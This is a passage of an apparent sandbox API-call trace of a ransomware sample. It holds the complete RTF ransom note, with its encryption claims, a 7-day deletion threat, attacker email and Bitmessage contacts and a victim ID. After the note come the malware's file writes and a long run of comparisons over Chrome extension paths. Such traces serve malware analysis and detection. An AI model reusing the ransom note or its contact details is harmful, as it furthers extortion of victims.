decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.370] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.371] CloseHandle (hObject=0x294) returned 1 [0273.371] Sleep (dwMilliseconds=0x3e8) [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount2=130) returned 1 [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=118) returned 3 [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=118) returned 3 [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount2=131) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount2=131) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount2=131) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount2=131) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount2=130) 